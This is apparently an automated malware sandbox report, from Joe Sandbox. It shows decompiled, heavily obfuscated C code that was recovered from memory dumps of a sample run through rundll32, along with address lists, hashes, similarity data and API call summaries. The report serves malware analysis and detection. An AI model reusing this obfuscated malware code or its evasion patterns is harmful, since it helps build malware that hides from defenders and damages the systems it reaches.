                                                                                                                      							E002D12A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
                                                                                                                      							 *((short*)(E002C4FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
                                                                                                                      							E002B8650(_v2712,  &_v1560, _t475, _v2728);
                                                                                                                      							_push(_v2612);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x2b181c);
                                                                                                                      							E002BE7CE(E002BAB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
                                                                                                                      							E002BAE03(_v2688, _v2704, _v2644, _t415);
                                                                                                                      							_t427 = _v2764;
                                                                                                                      							_t404 = E002CC38F(_t427,  &_v2080, _t463, _v2696);
                                                                                                                      							_t468 =  &(_t468[0x15]);
                                                                                                                      							if(_t404 != 0) {
                                                                                                                      								_t464 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t404;
                                                                                                                      				}
                                                                                                                      				_push(_t427);
                                                                                                                      				E002BEA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
                                                                                                                      				_push(_v2616);
                                                                                                                      				_push(_v2748);
                                                                                                                      				_push(0x2b18cc);
                                                                                                                      				E002BE7CE(E002BAB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
                                                                                                                      				_t430 = _v2724;
                                                                                                                      				E002BAE03(_t430, _v2640, _v2648, _t406);
                                                                                                                      				_push(_v2632);
                                                                                                                      				_push(_v2624);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2720);
                                                                                                                      				_push(_t430);
                                                                                                                      				_push(0);
                                                                                                                      				_t427 =  &_v520;
                                                                                                                      				_t404 = E002B9700(_t427, _v2676, __eflags);
                                                                                                                      				_t468 =  &(_t468[0x1c]);
                                                                                                                      				_t464 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}
































































                                                                                                                      0x002b8020
                                                                                                                      0x002b802b
                                                                                                                      0x002b8036
                                                                                                                      0x002b803e
                                                                                                                      0x002b804c
                                                                                                                      0x002b8051
                                                                                                                      0x002b8057
                                                                                                                      0x002b805f
                                                                                                                      0x002b8067
                                                                                                                      0x002b8072
                                                                                                                      0x002b807a
                                                                                                                      0x002b8085
                                                                                                                      0x002b8091
                                                                                                                      0x002b8096
                                                                                                                      0x002b809c
                                                                                                                      0x002b80a0
                                                                                                                      0x002b80a8
                                                                                                                      0x002b80b0
                                                                                                                      0x002b80bb
                                                                                                                      0x002b80c6
                                                                                                                      0x002b80d1
                                                                                                                      0x002b80dc
                                                                                                                      0x002b80e7
                                                                                                                      0x002b80f2
                                                                                                                      0x002b80fa
                                                                                                                      0x002b8103
                                                                                                                      0x002b8106
                                                                                                                      0x002b810a
                                                                                                                      0x002b8112
                                                                                                                      0x002b811a
                                                                                                                      0x002b8122
                                                                                                                      0x002b812a
                                                                                                                      0x002b8132
                                                                                                                      0x002b813a
                                                                                                                      0x002b813f
                                                                                                                      0x002b8143
                                                                                                                      0x002b8148
                                                                                                                      0x002b8150
                                                                                                                      0x002b815b
                                                                                                                      0x002b8166
                                                                                                                      0x002b8171
                                                                                                                      0x002b817c
                                                                                                                      0x002b8187
                                                                                                                      0x002b8192
                                                                                                                      0x002b81a0
                                                                                                                      0x002b82a5
                                                                                                                      0x00000000
                                                                                                                      0x002b81a6
                                                                                                                      0x002b81a6
                                                                                                                      0x002b81ac
                                                                                                                      0x002b838b
                                                                                                                      0x002b838b
                                                                                                                      0x002b8391
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b81b2
                                                                                                                      0x002b81c6
                                                                                                                      0x002b81f3
                                                                                                                      0x002b81fa
                                                                                                                      0x002b81ff
                                                                                                                      0x002b8206
                                                                                                                      0x002b8218
                                                                                                                      0x002b825e
                                                                                                                      0x002b8276
                                                                                                                      0x002b8282
                                                                                                                      0x002b828e
                                                                                                                      0x002b8293
                                                                                                                      0x002b8298
                                                                                                                      0x002b829e
                                                                                                                      0x00000000
                                                                                                                      0x002b829e
                                                                                                                      0x002b8298
                                                                                                                      0x002b81ac
                                                                                                                      0x002b83a0
                                                                                                                      0x002b83a0
                                                                                                                      0x002b82af
                                                                                                                      0x002b82d2
                                                                                                                      0x002b82d7
                                                                                                                      0x002b82de
                                                                                                                      0x002b82f0
                                                                                                                      0x002b8333
                                                                                                                      0x002b8347
                                                                                                                      0x002b834b
                                                                                                                      0x002b8353
                                                                                                                      0x002b835a
                                                                                                                      0x002b8361
                                                                                                                      0x002b8365
                                                                                                                      0x002b8367
                                                                                                                      0x002b8369
                                                                                                                      0x002b8374
                                                                                                                      0x002b8375
                                                                                                                      0x002b8377
                                                                                                                      0x002b837e
                                                                                                                      0x002b8383
                                                                                                                      0x002b8386
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: dac6ac3afee83520dacbeccdcc4bd325f5cf65b4b1fb99dc57fc8b98cb77958e
                                                                                                                      • Instruction ID: baf1e978c42777235f9fe1ef7f1fc7a489dd54af3d5d6e2263452f1b04c21c96
                                                                                                                      • Opcode Fuzzy Hash: dac6ac3afee83520dacbeccdcc4bd325f5cf65b4b1fb99dc57fc8b98cb77958e
                                                                                                                      • Instruction Fuzzy Hash: 22121F71518381DFD3A8CF21C58AA8BFBE1BBC5758F108A1DE2D986260D7B18919CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C74DD() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				unsigned int _v128;
                                                                                                                      				unsigned int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int* _t377;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int* _t384;
                                                                                                                      				void* _t385;
                                                                                                                      				intOrPtr _t396;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t402;
                                                                                                                      				signed int _t403;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t406;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int _t408;
                                                                                                                      				void* _t409;
                                                                                                                      				signed int* _t410;
                                                                                                                      				signed int* _t444;
                                                                                                                      				void* _t452;
                                                                                                                      				signed int* _t456;
                                                                                                                      
                                                                                                                      				_t456 =  &_v152;
                                                                                                                      				_v8 = 0x511491;
                                                                                                                      				_t396 = 0;
                                                                                                                      				_t452 = 0x68b0bf3;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v108 = 0xf5425d;
                                                                                                                      				_t398 = 0x24;
                                                                                                                      				_v108 = _v108 / _t398;
                                                                                                                      				_v108 = _v108 | 0xbb3a7fab;
                                                                                                                      				_v108 = _v108 ^ 0xbb3effbb;
                                                                                                                      				_v132 = 0xf54152;
                                                                                                                      				_v132 = _v132 + 0x73b9;
                                                                                                                      				_v132 = _v132 | 0x673a86bd;
                                                                                                                      				_v132 = _v132 >> 4;
                                                                                                                      				_v132 = _v132 ^ 0x067ffb7b;
                                                                                                                      				_v36 = 0x17d741;
                                                                                                                      				_v36 = _v36 << 0xe;
                                                                                                                      				_v36 = _v36 ^ 0xf5d04000;
                                                                                                                      				_v72 = 0xb99ed8;
                                                                                                                      				_t399 = 0x74;
                                                                                                                      				_v72 = _v72 * 0x57;
                                                                                                                      				_v72 = _v72 ^ 0x28cb8c28;
                                                                                                                      				_v72 = _v72 ^ 0x17df7740;
                                                                                                                      				_v100 = 0xb82182;
                                                                                                                      				_v100 = _v100 >> 2;
                                                                                                                      				_v100 = _v100 | 0xc07135d2;
                                                                                                                      				_v100 = _v100 ^ 0xc07f3df2;
                                                                                                                      				_v120 = 0x71fefc;
                                                                                                                      				_v120 = _v120 ^ 0x3c3b57cf;
                                                                                                                      				_v120 = _v120 ^ 0xde073c70;
                                                                                                                      				_v120 = _v120 + 0xffffefcb;
                                                                                                                      				_v120 = _v120 ^ 0xe24618f4;
                                                                                                                      				_v128 = 0x9b3c32;
                                                                                                                      				_v128 = _v128 >> 0xb;
                                                                                                                      				_v128 = _v128 ^ 0x48395a77;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 ^ 0x000e9da5;
                                                                                                                      				_v136 = 0x52cc3f;
                                                                                                                      				_v136 = _v136 * 0x6b;
                                                                                                                      				_v136 = _v136 ^ 0x9c4f2321;
                                                                                                                      				_v136 = _v136 | 0xfd912896;
                                                                                                                      				_v136 = _v136 ^ 0xffd2684a;
                                                                                                                      				_v48 = 0x5298d7;
                                                                                                                      				_v48 = _v48 ^ 0x46ea6646;
                                                                                                                      				_v48 = _v48 ^ 0x46b0922b;
                                                                                                                      				_v112 = 0xeb4fde;
                                                                                                                      				_v112 = _v112 / _t399;
                                                                                                                      				_v112 = _v112 >> 0xc;
                                                                                                                      				_t400 = 0x56;
                                                                                                                      				_v112 = _v112 / _t400;
                                                                                                                      				_v112 = _v112 ^ 0x0003a7ac;
                                                                                                                      				_v52 = 0x2cac0;
                                                                                                                      				_v52 = _v52 + 0x2e2d;
                                                                                                                      				_v52 = _v52 ^ 0x00080243;
                                                                                                                      				_v124 = 0x3dbea4;
                                                                                                                      				_v124 = _v124 + 0x560a;
                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 ^ 0x00027af4;
                                                                                                                      				_v56 = 0x4e9164;
                                                                                                                      				_v56 = _v56 >> 0xd;
                                                                                                                      				_v56 = _v56 ^ 0x00077014;
                                                                                                                      				_v28 = 0x1ac9f;
                                                                                                                      				_v28 = _v28 << 7;
                                                                                                                      				_v28 = _v28 ^ 0x00d40977;
                                                                                                                      				_v148 = 0xc87974;
                                                                                                                      				_t401 = 0xf;
                                                                                                                      				_v148 = _v148 / _t401;
                                                                                                                      				_v148 = _v148 + 0x3bc4;
                                                                                                                      				_v148 = _v148 >> 2;
                                                                                                                      				_v148 = _v148 ^ 0x0004ff8e;
                                                                                                                      				_v140 = 0x51bf99;
                                                                                                                      				_v140 = _v140 + 0x1f0d;
                                                                                                                      				_v140 = _v140 | 0x6ce4c515;
                                                                                                                      				_v140 = _v140 << 7;
                                                                                                                      				_v140 = _v140 ^ 0x7aef3c21;
                                                                                                                      				_v64 = 0x9041a6;
                                                                                                                      				_v64 = _v64 | 0xf9fd38a0;
                                                                                                                      				_v64 = _v64 + 0x56fc;
                                                                                                                      				_v64 = _v64 ^ 0xf9f31663;
                                                                                                                      				_v96 = 0xb1a19;
                                                                                                                      				_v96 = _v96 + 0x5234;
                                                                                                                      				_t402 = 0x68;
                                                                                                                      				_v96 = _v96 * 0x32;
                                                                                                                      				_v96 = _v96 ^ 0x0237c494;
                                                                                                                      				_v152 = 0x354a37;
                                                                                                                      				_v152 = _v152 | 0x37184972;
                                                                                                                      				_v152 = _v152 ^ 0x144b30cb;
                                                                                                                      				_v152 = _v152 * 0x1f;
                                                                                                                      				_v152 = _v152 ^ 0x4b54d1c6;
                                                                                                                      				_v116 = 0xf3726e;
                                                                                                                      				_v116 = _v116 + 0xcc69;
                                                                                                                      				_v116 = _v116 >> 3;
                                                                                                                      				_v116 = _v116 + 0x674b;
                                                                                                                      				_v116 = _v116 ^ 0x001624aa;
                                                                                                                      				_v44 = 0x3b88ac;
                                                                                                                      				_v44 = _v44 / _t402;
                                                                                                                      				_v44 = _v44 ^ 0x00096110;
                                                                                                                      				_v20 = 0x83fd7f;
                                                                                                                      				_v20 = _v20 ^ 0x5c57be60;
                                                                                                                      				_v20 = _v20 ^ 0x5cd84720;
                                                                                                                      				_v144 = 0x80ab55;
                                                                                                                      				_t403 = 0x46;
                                                                                                                      				_v144 = _v144 / _t403;
                                                                                                                      				_v144 = _v144 + 0xffffcaef;
                                                                                                                      				_v144 = _v144 + 0xffff67c3;
                                                                                                                      				_v144 = _v144 ^ 0x00052ea0;
                                                                                                                      				_v16 = 0xeb356a;
                                                                                                                      				_t199 =  &_v16; // 0xeb356a
                                                                                                                      				_t404 = 0x65;
                                                                                                                      				_v16 =  *_t199 / _t404;
                                                                                                                      				_v16 = _v16 ^ 0x000ce393;
                                                                                                                      				_v88 = 0xe75d2;
                                                                                                                      				_v88 = _v88 + 0xe1a2;
                                                                                                                      				_v88 = _v88 ^ 0xbfa107b7;
                                                                                                                      				_v88 = _v88 ^ 0xbfa92cf6;
                                                                                                                      				_v40 = 0xb57020;
                                                                                                                      				_t405 = 0x18;
                                                                                                                      				_v40 = _v40 / _t405;
                                                                                                                      				_v40 = _v40 ^ 0x000d9612;
                                                                                                                      				_v80 = 0xaa39d6;
                                                                                                                      				_t406 = 0x4c;
                                                                                                                      				_v80 = _v80 / _t406;
                                                                                                                      				_t407 = 0x4f;
                                                                                                                      				_v80 = _v80 / _t407;
                                                                                                                      				_v80 = _v80 ^ 0x000dd886;
                                                                                                                      				_v84 = 0x7565b2;
                                                                                                                      				_v84 = _v84 ^ 0x85e60cd2;
                                                                                                                      				_v84 = _v84 | 0xe2f126fa;
                                                                                                                      				_v84 = _v84 ^ 0xe7fbef1f;
                                                                                                                      				_v92 = 0x20921c;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_t408 = 0x3d;
                                                                                                                      				_v92 = _v92 / _t408;
                                                                                                                      				_v92 = _v92 ^ 0x0137fd8d;
                                                                                                                      				_v104 = 0x7d1988;
                                                                                                                      				_v104 = _v104 | 0x48f8c783;
                                                                                                                      				_v104 = _v104 * 0x2a;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0f9ace16;
                                                                                                                      				_v32 = 0xc6b5a4;
                                                                                                                      				_v32 = _v32 ^ 0x611852a0;
                                                                                                                      				_v32 = _v32 ^ 0x61d9018e;
                                                                                                                      				_v24 = 0x4e0063;
                                                                                                                      				_v24 = _v24 * 0x56;
                                                                                                                      				_v24 = _v24 ^ 0x1a371aa3;
                                                                                                                      				_v60 = 0xb39a6a;
                                                                                                                      				_v60 = _v60 + 0x379a;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0x9e9cdd6f;
                                                                                                                      				_v68 = 0xe7ba26;
                                                                                                                      				_v68 = _v68 + 0xffffbb05;
                                                                                                                      				_v68 = _v68 ^ 0xbd703087;
                                                                                                                      				_v68 = _v68 ^ 0xbd98ca1c;
                                                                                                                      				_v76 = 0x8102f3;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 * 0x7c;
                                                                                                                      				_v76 = _v76 ^ 0x9f574684;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t444 =  *0x2d5c90; // 0x0
                                                                                                                      					_t373 = 0x882fd94;
                                                                                                                      					do {
                                                                                                                      						if(_t452 == 0x68b0bf3) {
                                                                                                                      							_push(_t408);
                                                                                                                      							_push(_t408);
                                                                                                                      							_t409 = 0x28;
                                                                                                                      							_t377 = E002C3512(_t409);
                                                                                                                      							 *0x2d5c90 = _t377;
                                                                                                                      							_t377[3] = 0x4000;
                                                                                                                      							_t410 =  *0x2d5c90; // 0x0
                                                                                                                      							_t381 = E002C3512(_t410[3]);
                                                                                                                      							_t444 =  *0x2d5c90; // 0x0
                                                                                                                      							_t452 = 0xf7a4d1a;
                                                                                                                      							_t408 = _t381;
                                                                                                                      							_t383 = _t444[3] + _t408;
                                                                                                                      							__eflags = _t383;
                                                                                                                      							_t444[2] = _t408;
                                                                                                                      							_t444[1] = _t408;
                                                                                                                      							 *_t444 = _t408;
                                                                                                                      							_t444[5] = _t383;
                                                                                                                      							L12:
                                                                                                                      							_t373 = 0x882fd94;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t452 == _t373) {
                                                                                                                      							_t384 =  *0x2d5c90; // 0x0
                                                                                                                      							_t408 = _v20;
                                                                                                                      							_t385 = E002BC795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
                                                                                                                      							_t456 =  &(_t456[6]);
                                                                                                                      							__eflags = _t385 - _v72;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t452 = 0xcb14d1c;
                                                                                                                      							} else {
                                                                                                                      								_t452 = 0xd2040d1;
                                                                                                                      								_t396 = 1;
                                                                                                                      							}
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xcb14d1c) {
                                                                                                                      							E002B68DE(_v84, _v92, _v104, _v32, _t444[2]);
                                                                                                                      							E002B68DE(_v24, _v60, _v68, _v76,  *0x2d5c90);
                                                                                                                      							L17:
                                                                                                                      							return _t396;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xd2040d1) {
                                                                                                                      							E002B7027(_v40, _v100, _v12, _v80);
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_t463 = _t452 - 0xf7a4d1a;
                                                                                                                      						if(_t452 != 0xf7a4d1a) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_push(_v148);
                                                                                                                      						_push(_v28);
                                                                                                                      						_push(0x2b1324);
                                                                                                                      						E002C0EDA(0, _v108, _v140, E002BAB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
                                                                                                                      						_t408 = _v152;
                                                                                                                      						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
                                                                                                                      						E002BAE03(_t408, _v116, _v44, _t390);
                                                                                                                      						_t444 =  *0x2d5c90; // 0x0
                                                                                                                      						_t456 =  &(_t456[0xa]);
                                                                                                                      						goto L12;
                                                                                                                      						L13:
                                                                                                                      					} while (_t452 != 0xd072e76);
                                                                                                                      					goto L17;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x002c767e
                                                                                                                      0x002c7686
                                                                                                                      0x002c768e
                                                                                                                      0x002c7696
                                                                                                                      0x002c769b
                                                                                                                      0x002c76a0
                                                                                                                      0x002c76a8
                                                                                                                      0x002c76b0
                                                                                                                      0x002c76b5
                                                                                                                      0x002c76bd
                                                                                                                      0x002c76ca
                                                                                                                      0x002c76d2
                                                                                                                      0x002c76dd
                                                                                                                      0x002c76eb
                                                                                                                      0x002c76f0
                                                                                                                      0x002c76f6
                                                                                                                      0x002c76fe
                                                                                                                      0x002c7703
                                                                                                                      0x002c770b
                                                                                                                      0x002c7713
                                                                                                                      0x002c771b
                                                                                                                      0x002c7723
                                                                                                                      0x002c7728
                                                                                                                      0x002c7730
                                                                                                                      0x002c7738
                                                                                                                      0x002c7740
                                                                                                                      0x002c7748
                                                                                                                      0x002c7750
                                                                                                                      0x002c7758
                                                                                                                      0x002c7765
                                                                                                                      0x002c7768
                                                                                                                      0x002c776c
                                                                                                                      0x002c7774
                                                                                                                      0x002c777c
                                                                                                                      0x002c7784
                                                                                                                      0x002c7791
                                                                                                                      0x002c7795
                                                                                                                      0x002c779d
                                                                                                                      0x002c77a5
                                                                                                                      0x002c77ad
                                                                                                                      0x002c77b2
                                                                                                                      0x002c77ba
                                                                                                                      0x002c77c2
                                                                                                                      0x002c77d8
                                                                                                                      0x002c77df
                                                                                                                      0x002c77ea
                                                                                                                      0x002c77f5
                                                                                                                      0x002c7800
                                                                                                                      0x002c780b
                                                                                                                      0x002c7817
                                                                                                                      0x002c781c
                                                                                                                      0x002c7822
                                                                                                                      0x002c782a
                                                                                                                      0x002c7832
                                                                                                                      0x002c783a
                                                                                                                      0x002c7845
                                                                                                                      0x002c784c
                                                                                                                      0x002c7851
                                                                                                                      0x002c785a
                                                                                                                      0x002c7865
                                                                                                                      0x002c786d
                                                                                                                      0x002c7875
                                                                                                                      0x002c787d
                                                                                                                      0x002c7885
                                                                                                                      0x002c7897
                                                                                                                      0x002c789a
                                                                                                                      0x002c78a1
                                                                                                                      0x002c78ac
                                                                                                                      0x002c78c1
                                                                                                                      0x002c78c6
                                                                                                                      0x002c78d0
                                                                                                                      0x002c78d5
                                                                                                                      0x002c78db
                                                                                                                      0x002c78e3
                                                                                                                      0x002c78eb
                                                                                                                      0x002c78f3
                                                                                                                      0x002c78fb
                                                                                                                      0x002c7903
                                                                                                                      0x002c790b
                                                                                                                      0x002c7914
                                                                                                                      0x002c7917
                                                                                                                      0x002c791b
                                                                                                                      0x002c7923
                                                                                                                      0x002c792b
                                                                                                                      0x002c7938
                                                                                                                      0x002c793c
                                                                                                                      0x002c7941
                                                                                                                      0x002c7949
                                                                                                                      0x002c7954
                                                                                                                      0x002c795f
                                                                                                                      0x002c796a
                                                                                                                      0x002c797d
                                                                                                                      0x002c7984
                                                                                                                      0x002c798f
                                                                                                                      0x002c7997
                                                                                                                      0x002c799f
                                                                                                                      0x002c79a4
                                                                                                                      0x002c79ac
                                                                                                                      0x002c79b4
                                                                                                                      0x002c79bc
                                                                                                                      0x002c79c4
                                                                                                                      0x002c79cc
                                                                                                                      0x002c79d4
                                                                                                                      0x002c79de
                                                                                                                      0x002c79e2
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79f0
                                                                                                                      0x002c79f5
                                                                                                                      0x002c79fb
                                                                                                                      0x002c7afa
                                                                                                                      0x002c7afb
                                                                                                                      0x002c7afe
                                                                                                                      0x002c7aff
                                                                                                                      0x002c7b04
                                                                                                                      0x002c7b09
                                                                                                                      0x002c7b1f
                                                                                                                      0x002c7b28
                                                                                                                      0x002c7b2d
                                                                                                                      0x002c7b33
                                                                                                                      0x002c7b3a
                                                                                                                      0x002c7b3f
                                                                                                                      0x002c7b3f
                                                                                                                      0x002c7b41
                                                                                                                      0x002c7b44
                                                                                                                      0x002c7b47
                                                                                                                      0x002c7b49
                                                                                                                      0x002c7b4c
                                                                                                                      0x002c7b4c
                                                                                                                      0x00000000
                                                                                                                      0x002c7b4c
                                                                                                                      0x002c7a03
                                                                                                                      0x002c7aa8
                                                                                                                      0x002c7ac5
                                                                                                                      0x002c7acc
                                                                                                                      0x002c7ad1
                                                                                                                      0x002c7ad4
                                                                                                                      0x002c7ad8
                                                                                                                      0x002c7ae7
                                                                                                                      0x002c7ada
                                                                                                                      0x002c7adc
                                                                                                                      0x002c7ae1
                                                                                                                      0x002c7ae1
                                                                                                                      0x00000000
                                                                                                                      0x002c7ad8
                                                                                                                      0x002c7a0b
                                                                                                                      0x002c7b94
                                                                                                                      0x002c7bb5
                                                                                                                      0x002c7bc0
                                                                                                                      0x002c7bc9
                                                                                                                      0x002c7bc9
                                                                                                                      0x002c7a17
                                                                                                                      0x002c7b75
                                                                                                                      0x00000000
                                                                                                                      0x002c7b7b
                                                                                                                      0x002c7a1d
                                                                                                                      0x002c7a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c7a29
                                                                                                                      0x002c7a2d
                                                                                                                      0x002c7a3c
                                                                                                                      0x002c7a63
                                                                                                                      0x002c7a83
                                                                                                                      0x002c7a87
                                                                                                                      0x002c7a8a
                                                                                                                      0x002c7a8f
                                                                                                                      0x002c7a95
                                                                                                                      0x00000000
                                                                                                                      0x002c7b51
                                                                                                                      0x002c7b51
                                                                                                                      0x00000000
                                                                                                                      0x002c7b5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$7J5$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-218644068
                                                                                                                      • Opcode ID: 0402698428e5107d5477c528a230919997ffd6addd13130091d66653888053f4
                                                                                                                      • Instruction ID: e302119a38cde4eaff24dc502f884b917eafc29a9a243a402b8a3b059f69b923
                                                                                                                      • Opcode Fuzzy Hash: 0402698428e5107d5477c528a230919997ffd6addd13130091d66653888053f4
                                                                                                                      • Instruction Fuzzy Hash: 530232715083808FD3A8CF25D48AA4BFBF2FBC5758F50891DF29986260D7B58958CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002B6083(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				char _v256;
                                                                                                                      				char _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
